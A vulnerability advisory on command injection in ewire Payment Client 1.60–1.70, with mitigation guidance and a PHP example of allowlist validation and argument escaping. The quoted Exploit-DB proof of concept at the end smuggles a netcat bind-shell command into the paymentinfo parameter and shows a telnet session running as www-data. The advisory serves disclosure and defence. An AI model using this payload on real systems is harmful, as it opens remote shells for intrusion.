Arbitrary Command Execution (CWE-78)
Vendor: Payment Client
Author: Unknown
CVSS: 7.5 (HIGH)
Product Name: Payment Client
Affected Version From: 1.6
Affected Version To: 1.7
Patch Exists: NO
Related CWE: None mentioned
CPE: cpe:/a:ewire:payment_client:1.60, cpe:/a:ewire:payment_client:1.70
Metasploit:
Other Scripts:
Platforms Tested: None mentioned

Arbitrary Command Execution in ewire Payment Client

The ewire Payment Client is vulnerable to arbitrary command execution. Because the software does not properly sanitize user-supplied input before passing it to a shell, an attacker can inject shell metacharacters into a request parameter and execute arbitrary shell commands on the affected computer with the privileges of the application using the affected class utility.

Mitigation:

To mitigate this vulnerability, validate and sanitize user-supplied input before it is used in commands, and pass values to a command as quoted arguments rather than interpolating them into a shell command line. Additionally, apply regular software updates and patches so that the latest security fixes are in place.
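As an added illustration of that mitigation (example code written for this page, not the ewire Payment Client's own source), the handler below validates the request parameter against an allowlist and, as a second layer, passes it to the command through escapeshellarg(). The parameter name paymentinfo is taken from the proof of concept; the helper names, the allowlist pattern and the command path are assumptions.

```php
<?php
// Added example, not code from the ewire Payment Client. Function names, the
// allowlist pattern and the command path are assumptions for illustration.

// Step 1: refuse anything outside a strict allowlist. A payment reference is
// assumed to be short and alphanumeric, so backticks, $(...), ';', '|' and
// whitespace can never reach the shell.
function validatePaymentInfo(string $raw): ?string
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $raw) === 1 ? $raw : null;
}

// Step 2: even after validation, never interpolate the value into the command
// string. escapeshellarg() wraps it in single quotes and escapes embedded
// quotes, so the shell sees one literal argument.
function buildReceiveCommand(string $paymentInfo): string
{
    return '/usr/local/bin/payment-receive ' . escapeshellarg($paymentInfo);
}

// Request handler: reject invalid input with a 400 instead of running anything.
function handlePaymentReceive(array $query): string
{
    $info = validatePaymentInfo((string)($query['paymentinfo'] ?? ''));
    if ($info === null) {
        http_response_code(400);
        return 'invalid paymentinfo';
    }
    // Only the escaped argument is ever handed to shell_exec(); the command
    // path itself is a placeholder.
    return (string)shell_exec(buildReceiveCommand($info));
}

// Constructed values for a quick self-check from the CLI (php this_file.php).
// No command is executed here; only validation and command building are shown.
$hostile = '`id`';            // constructed: shell substitution inside the parameter
$benign  = 'INV-2024-0001';   // constructed: a well-formed reference

var_dump(validatePaymentInfo($hostile)); // rejected by the allowlist
var_dump(validatePaymentInfo($benign));  // accepted unchanged
echo buildReceiveCommand($hostile), PHP_EOL; // backticks arrive inside single quotes
echo buildReceiveCommand($benign), PHP_EOL;
```

The allowlist is the primary control: the request is rejected before any command string exists. escapeshellarg() is kept as defence in depth so that loosening the pattern later does not reintroduce the injection, and the placeholder command path stands in for whatever utility the application actually invokes.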

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25683/info

ewire Payment Client is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary shell commands on an affected computer with the privileges of the application using the affected class utility.

ewire Payment Client 1.60 and 1.70 are vulnerable to this issue.

GET
http://www.example.com/simplePHPLinux/3payment_receive.php?paymentinfo=`/bin/nc -l -p6666 -e /bin/bash`

$ telnet www.example.com 6666
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)